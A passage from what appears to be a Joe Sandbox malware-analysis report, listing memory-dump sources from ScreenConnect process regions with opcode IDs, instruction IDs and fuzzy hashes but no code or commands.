                                                                • Instruction Fuzzy Hash: 86110A34B00218DFDB04DF68C995AADB7F2AF8D310F158569D905EB365CB75AD018B90
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: eb9b54f01508a3d893ff39a6eee49c0d0d3cce203fbb2e671a1a423e4e159618
                                                                • Instruction ID: 743b01d6d2c6456e2f7d60d369b041a88417a0b6235c935e726d960e23b5ecb9
                                                                • Opcode Fuzzy Hash: eb9b54f01508a3d893ff39a6eee49c0d0d3cce203fbb2e671a1a423e4e159618
                                                                • Instruction Fuzzy Hash: 7E1103B1C042498FDB10CF9AC445BEEFBF8EB48320F158429D558A7241C379A545CFA5
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a26d0822f40f701d2cb288e1fc2cdbf2ca6a64d848b1c162c23d9332e482ff4c
                                                                • Instruction ID: e8d3b99fb4f68ee7598a00feb1dfea60b6323639b012ef1de10057dd1164c7b0
                                                                • Opcode Fuzzy Hash: a26d0822f40f701d2cb288e1fc2cdbf2ca6a64d848b1c162c23d9332e482ff4c
                                                                • Instruction ID: 81377aeb4c6f7c9efa14da9cee1b37b34df9b3d11b5bda9ad2e2cc17afd39bd7
                                                                • Opcode Fuzzy Hash: 9517225211bd5d98dc471f5e183cdd0cc5a09a3bfdae01610f9a0cfb82759dd6
                                                                • Instruction Fuzzy Hash: 8FF04970D4031ACFEB21EFA4E8287AEBBB1EB85314F014969C9119B245EF795916CB81
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9d62acf6aaf581dc03cf0897545400a9fd5c6758e034b1e8acb5a233115abd46
                                                                • Instruction ID: ec90cb87a67e4e2cd2e2311f2242b95e57b39396a653f5e062a96222e6dd3213
                                                                • Opcode Fuzzy Hash: 9d62acf6aaf581dc03cf0897545400a9fd5c6758e034b1e8acb5a233115abd46
                                                                • Instruction Fuzzy Hash: 74F030353057408FC314DB58C554A56BBF6EF8A714B5984A9E55A8B361C671EC02CB40
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ebacd45906408bc2b7407f32184b21ecad6178402471f94b4ad402ea3c0e080e
                                                                • Instruction ID: 621871d9cf915b6fd61b29efe7b408f89e1750e7cb15af18fe295d7deb0f137f
                                                                • Opcode Fuzzy Hash: ebacd45906408bc2b7407f32184b21ecad6178402471f94b4ad402ea3c0e080e
                                                                • Instruction Fuzzy Hash: F3F07471D11219DFCB44DFADD841A9EBBF0FF49200B158166D928EB221E731AA528F84
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2f30a0c02ca008c5ba0bcb5bd951ec01b909a6a572ad0f6a57ffee8cfb57b148
                                                                • Instruction ID: 384b7a78da1808e3a4874d12d2c66c64679547e90b5385ddac17ff3cd8f85d9a
                                                                • Opcode Fuzzy Hash: 2f30a0c02ca008c5ba0bcb5bd951ec01b909a6a572ad0f6a57ffee8cfb57b148
                                                                • Instruction Fuzzy Hash: 5BF03A31A002198BEB249B64D4287DEBAF6EF8C200F100539D402B7794CBB65D44CBE1
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ba8dcb81f7fe430fdf050e0aa0f696fced582c56dde609f6de9aa984fc3e535c
                                                                • Instruction ID: 81b7e910aed0365cf0f5beed5a3cccfc7a5bfa77dd5aec3285153dc5d490e321
                                                                • Opcode Fuzzy Hash: ba8dcb81f7fe430fdf050e0aa0f696fced582c56dde609f6de9aa984fc3e535c
                                                                • Instruction Fuzzy Hash: 83F03A30B0011ACFC714DF69D554AAABBE1EF88310B0480A9E915CB364EB75DD11CB90
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2f1ac557c9cf2411a93e34ccc5c1e63ba23d18992d54d33a6d9966859321611c
                                                                • Instruction ID: fdcf57bd10b668369bbf3bfd36f6b6ac5bb3d192de7aaaf455300f851f69fb61
                                                                • Opcode Fuzzy Hash: 2f1ac557c9cf2411a93e34ccc5c1e63ba23d18992d54d33a6d9966859321611c
                                                                • Instruction Fuzzy Hash: 89E0307A704219AB4754DA9AD800D5EBBAADBC8260718C056F918C7304DA71D9128764
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0b6693b7859993b0cc6d64ee250178bc96be878ac930a89e8f6bb7b3d9343ce1
                                                                • Instruction ID: 251832289ebf7e39ed5bb0ccbbc010482078f6de642a76c912f4a650d117deec
                                                                • Opcode Fuzzy Hash: 0b6693b7859993b0cc6d64ee250178bc96be878ac930a89e8f6bb7b3d9343ce1
                                                                • Instruction Fuzzy Hash: 10F01735E00219CFCB10DFA8E8486DCBBB1FF8A310F1042A6E109AB220EB315A95CF51
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8d792531246408b00d56b64556899947480d5de7ecaa184ce4f555232a1c3033
                                                                • Instruction ID: a88efd570b511b1d41d5931038882ae4ba7d4aee9930671b513381333e376a29
                                                                • Opcode Fuzzy Hash: 8d792531246408b00d56b64556899947480d5de7ecaa184ce4f555232a1c3033
                                                                • Instruction Fuzzy Hash: 10F08C319583848FC752EB7888514EDBFF0EE0A150B1948EBD588DB232E2348A06CB91
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bb97963d3a0438313c09b4372eabf9fa64aa73b5cea6713ced8be2db4fc29efd
                                                                • Instruction ID: addc205bc2a9d768dbfe7c4f961304f83deb582619fc230f25e99a50d36c0abb
                                                                • Opcode Fuzzy Hash: bb97963d3a0438313c09b4372eabf9fa64aa73b5cea6713ced8be2db4fc29efd
                                                                • Instruction Fuzzy Hash: 9AF07471E00219DF8B44DFADD84169EFBF5EF49210B64C56AD918E7211E731AA12CFD0
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 368604062ec2735a7d6136095fb90215a063897e909fddeecda888bae6d60734
                                                                • Instruction ID: 4d2766a4a9ab9dbb8d4e8f239f7443cd06657813d17e2aa08b6b1a7a7e98f1b4
                                                                • Opcode Fuzzy Hash: 368604062ec2735a7d6136095fb90215a063897e909fddeecda888bae6d60734
                                                                • Instruction Fuzzy Hash: 32E01A35301200CFD314DB59D544E56BBEAEFC9B25F5984A9E5098B7A1CB72FC41CB90
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f2e2e49c0abeb4ca183125fa0cccbe2c103f5c7b880c7e14a623000ac3b2d5d5
                                                                • Instruction ID: 387d2f6af6b8f01210bd3ddf39be6b08a33d4c8a98447c3549d40b50aa851282
                                                                • Opcode Fuzzy Hash: f2e2e49c0abeb4ca183125fa0cccbe2c103f5c7b880c7e14a623000ac3b2d5d5
                                                                • Instruction Fuzzy Hash: AFE08632B012155BC314952EE890AA7B3AAEFC9724B104879950DD7355DD76DC438690
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cb46b4b010ba729113b094814ca81450602f339af2807ccfedd38042405fbc3d
                                                                • Instruction ID: fbfb12f100e144e777250035d524da7bb03ea8f4cef0d11989aaecbb83434b60
                                                                • Opcode Fuzzy Hash: cb46b4b010ba729113b094814ca81450602f339af2807ccfedd38042405fbc3d
                                                                • Instruction Fuzzy Hash: 09E0C972504248BFCF02CFB4E9549A97FB6FB09200F048499F94586211D7328A25EB50
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3ee038860b9833faa0717822003bb7980c833e7e92ffebfac896416ef0bae03d
                                                                • Instruction ID: 4c8a84d5dd698332b8860621de32badf80674dd6f91b8265e52eb87bcb3fd672
                                                                • Opcode Fuzzy Hash: 3ee038860b9833faa0717822003bb7980c833e7e92ffebfac896416ef0bae03d
                                                                • Instruction Fuzzy Hash: 8EE0DF30906349EFCB02DFB4E9516ADBBB2FF8730171056EAD405DB206DA321E02DB01
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: caff4c66826e32d705e19f9003d4322797ee20831b6a3dcd6b597ad93a9d4296
                                                                • Instruction ID: 0ee9b2d81939b95d4cdbf00a0349ba88343418e8c6cbb2f17740a4e6f35e2ae3
                                                                • Opcode Fuzzy Hash: caff4c66826e32d705e19f9003d4322797ee20831b6a3dcd6b597ad93a9d4296
                                                                • Instruction Fuzzy Hash: CFE01A322442509FD314CB68E499F92BBB4EB4A724F0505D8E6898F7B2C663EC41CB40
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 51c09113462da5ed638816c495abd244bf10dc32a3e7f25b2512f3754bd9e22e
                                                                • Instruction ID: 3e4af268b486e0c53c0bd58351100ee558d6a6367d00f7e5e367864d54bece57
                                                                • Opcode Fuzzy Hash: 51c09113462da5ed638816c495abd244bf10dc32a3e7f25b2512f3754bd9e22e
                                                                • Instruction Fuzzy Hash: 8BE0E5B6D00229CFCB44DFA8C9511ADFBB0FB48705B2484AAC929EB210E3315712DFC1
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 75c02c6d336f245416d30954bfc76e82633797118d1b377591a1216840f4e89f
                                                                • Instruction ID: b5173a6179e069e33bfdc257296a222008716a87da8e8e6d4dfe1e137599ac64
                                                                • Opcode Fuzzy Hash: 75c02c6d336f245416d30954bfc76e82633797118d1b377591a1216840f4e89f
                                                                • Instruction Fuzzy Hash: 13E0863090014DFFD745EBB5FD106ADBBB4E705304F004BA9D988E7240EA316E058B81
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6c40ca23b3d06a23eaf7b912e55e081a733f0c5334b7b14a4da92c9f557cf293
                                                                • Instruction ID: 8bb427f2b1a5d395bc5b8ac035fadda48c60a73104885983f2855dd520924608
                                                                • Opcode Fuzzy Hash: 6c40ca23b3d06a23eaf7b912e55e081a733f0c5334b7b14a4da92c9f557cf293
                                                                • Instruction Fuzzy Hash: EFD0123220531687F7289E9EE4403D5F799EB81351F148539E58DC7598D6B658818784
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ba0d1e1da95faed56a27d3631971b8253757191c103118aa36e4b74da478ed75
                                                                • Instruction ID: 0c9b766c9b15cde6487b0373dbf62642ddaaa7eee2a02deac5d0dd023f925209
                                                                • Opcode Fuzzy Hash: ba0d1e1da95faed56a27d3631971b8253757191c103118aa36e4b74da478ed75
                                                                • Instruction Fuzzy Hash: D1E04F71E10109ABDB44EFB4E91579E7FB5EB89204F0085ACE508D7241EB326E068BC0
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f59e59f030c6f3b0287a73514844cc70fd2821492a1aafc41b3d3d8d15f0cd50
                                                                • Instruction ID: 445ae76c6464fc757a92b2978ea1dd286018370425570698bc0684f9880781fe
                                                                • Opcode Fuzzy Hash: f59e59f030c6f3b0287a73514844cc70fd2821492a1aafc41b3d3d8d15f0cd50
                                                                • Instruction Fuzzy Hash: CDE0E535D103098ADB01DBA4E8446DCFB71FF86310F504256E50577210E7712AD9CB81
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ae86c4a0c6e58e7c0f3239f6b1464b0a16a9348d6516f6d40e87ec84600b529e
                                                                • Instruction ID: da1b16c66e3909cc71cb25df35b94f24ba8cb402640d14139df50d08ea79b5ac
                                                                • Opcode Fuzzy Hash: ae86c4a0c6e58e7c0f3239f6b1464b0a16a9348d6516f6d40e87ec84600b529e
                                                                • Instruction Fuzzy Hash: 97E08632200014AFD7109F74E948FE87BB1FB48710F14C151F5448B220C7718C16DB80
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f59e59f030c6f3b0287a73514844cc70fd2821492a1aafc41b3d3d8d15f0cd50
                                                                • Instruction ID: 445ae76c6464fc757a92b2978ea1dd286018370425570698bc0684f9880781fe
                                                                • Opcode Fuzzy Hash: f59e59f030c6f3b0287a73514844cc70fd2821492a1aafc41b3d3d8d15f0cd50
                                                                • Instruction Fuzzy Hash: CDE0E535D103098ADB01DBA4E8446DCFB71FF86310F504256E50577210E7712AD9CB81
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fa926553dbea9c7a5430891b9108979a3f16cc4d36da4f487aa00aa9d94c7079
                                                                • Instruction ID: 4449ed4f36413a0987a9fa1f5deb080a9935a2188d0d146c8a303b7adacd6bf3
                                                                • Opcode Fuzzy Hash: fa926553dbea9c7a5430891b9108979a3f16cc4d36da4f487aa00aa9d94c7079
                                                                • Instruction Fuzzy Hash: ACE0B671D002299F8B80EFADD9015AEFBF4EF48210B10846AD91CE7201E3319B128FC1
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 169cdd6bd4a941c242007eefcc4c294b17db95c0666d6225f1b04b98aee216eb
                                                                • Instruction ID: f82e7427b04ea550c6ab04dbc4f21430433579160c710c4579c1ce68a7f0c489
                                                                • Opcode Fuzzy Hash: 169cdd6bd4a941c242007eefcc4c294b17db95c0666d6225f1b04b98aee216eb
                                                                • Instruction Fuzzy Hash: D9E02B36B04254EFD71A4A44FC15BB53F66DB88311F144029F906C63E1EF368C52CB84
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: edd1922eecef7da0db10e20d28076cb30ef1c245f1631d89ebcc881e179b449a
                                                                • Instruction ID: 3a513132e8c95e982ccdf48afabec03e944dceb8c49082e096cdd9562a6810d6
                                                                • Opcode Fuzzy Hash: edd1922eecef7da0db10e20d28076cb30ef1c245f1631d89ebcc881e179b449a
                                                                • Instruction Fuzzy Hash: E6E02E35B041508FC7208B78A094BA17FE2EF8E200B450488F185CB320C624CC07CB80
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 886d356796b891cae711ed95780b1bae6d5d5564a771e2333ea8d13cabcda60c
                                                                • Instruction ID: dc7f0d3e94605b6eb0e64355b00e563ce6086ba0a656e67aae2883d238f28368
                                                                • Opcode Fuzzy Hash: 886d356796b891cae711ed95780b1bae6d5d5564a771e2333ea8d13cabcda60c
                                                                • Instruction Fuzzy Hash: 66D05B343642068BFF19D7759414BB73797BFC4689F5444B4E445C3611EB62E8458154
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 546a47efb76196bb06f2acb8a561f7befbbb577c9091d7872af46a2509cb7bc5
                                                                • Instruction ID: 11e57f6bbb327d486176a2e9930c8d84fff1d21fb2c2dc6f0b3a43b3fed2ff38
                                                                • Opcode Fuzzy Hash: 546a47efb76196bb06f2acb8a561f7befbbb577c9091d7872af46a2509cb7bc5
                                                                • Instruction Fuzzy Hash: 68D052347612254FCB84E738E44896E33EAAF89A2035084A4E80ACB324EEA0EC0187D0
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fbf3c4a29417d0d294ad5df3349074a9b59cdc255d0f9b13ce29d8a8fa95e480
                                                                • Instruction ID: ec35012335e063d7a7efd1c84b7cc39ebb7cb0d869e4e6f488ba180e34527f7a
                                                                • Opcode Fuzzy Hash: fbf3c4a29417d0d294ad5df3349074a9b59cdc255d0f9b13ce29d8a8fa95e480
                                                                • Instruction Fuzzy Hash: 4EE08C328107088FC712ABB8D4954E87BB0EE96200B059A4BE08A57121EB30A195DB41
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 72fe2a069eecd53f219ad36672b4c11a2b25ccc82b2ba44e04c51143a153d817
                                                                • Instruction ID: 18b060c35a9acdcb2032f89655f0cfe6325ad5554c9cf9df3f5fe54793c4e539
                                                                • Opcode Fuzzy Hash: 72fe2a069eecd53f219ad36672b4c11a2b25ccc82b2ba44e04c51143a153d817
                                                                • Instruction Fuzzy Hash: 27D05E3A3415189F87049B4EE508C4AFFEAEFC9761305806AFA09C7330CA71EC01CBA4
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c43b0c7f2cedfa82e09fb564520c452c4ce209e8d500baf9de695b6eb1e1b83d
                                                                • Instruction ID: 5e640aae8445d7a075d4b71d7979febd1ccf1d61cb1acf6a824e73259a55c6cd
                                                                • Opcode Fuzzy Hash: c43b0c7f2cedfa82e09fb564520c452c4ce209e8d500baf9de695b6eb1e1b83d
                                                                • Instruction Fuzzy Hash: 04D09E36250118AFD7405B59E948DA57BE9EB49761F15C062FA098B361C672DC109B90
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f2d4bcdf12f16bf2cb289271c63b2875e8ea951f18d5cbde244f13883dc6b211
                                                                • Instruction ID: 030fe5aba29a7e8773526a528a67eeec9148086bc51b55180a85422bc91993d6
                                                                • Opcode Fuzzy Hash: f2d4bcdf12f16bf2cb289271c63b2875e8ea951f18d5cbde244f13883dc6b211
                                                                • Instruction Fuzzy Hash: C8D05E30A0020DFFDB44EFF9ED005AEB7B9EB49304B104AA9D908E7240EA316F049B90
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3eef03e1398d23ee90c9881a2560892aad7a60bb9814a666dd38a368a24bf2eb
                                                                • Instruction ID: 32c8817c430ddffbfce4e59f05f729a8b3283a891a96155821ca5fecaa3c4780
                                                                • Opcode Fuzzy Hash: 3eef03e1398d23ee90c9881a2560892aad7a60bb9814a666dd38a368a24bf2eb
                                                                • Instruction Fuzzy Hash: DFD01270A01209EB8B04DFA4E95555DBFF5EB85204B1045ADD408E3200EB315E019B80
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ad74937f26bddf323202c946c0444f38992b2b473b6627e4fde4ba165b8bf3d7
                                                                • Instruction ID: fc344571c207b41b187fe19c0bdfcc84adb0e219bf8625f30c93d62fdc81786d
                                                                • Opcode Fuzzy Hash: ad74937f26bddf323202c946c0444f38992b2b473b6627e4fde4ba165b8bf3d7
                                                                • Instruction Fuzzy Hash: 1CD01770A5130EEF8B04EFA9EA1059EBBFAEB45200B1045AC9408D3200EA316E009B80
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 254364928de805be6a2d255a77bd912dec67d6a02124c452ba26eed4b789dba2
                                                                • Instruction ID: 553ea0b79af10fdc9f107c9fa3af58a8f5f902a172e4c510d5c502cc97f63eb9
                                                                • Opcode Fuzzy Hash: 254364928de805be6a2d255a77bd912dec67d6a02124c452ba26eed4b789dba2
                                                                • Instruction Fuzzy Hash: BED01270A0020DEB9F04DFB8E90055DB7B5EB59204B1085A9D808D3310EA31AE049B44
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5abb42da74fcf284e0dc63408b9a8c32d0e8f3d9c94726214b9f581c00f43246
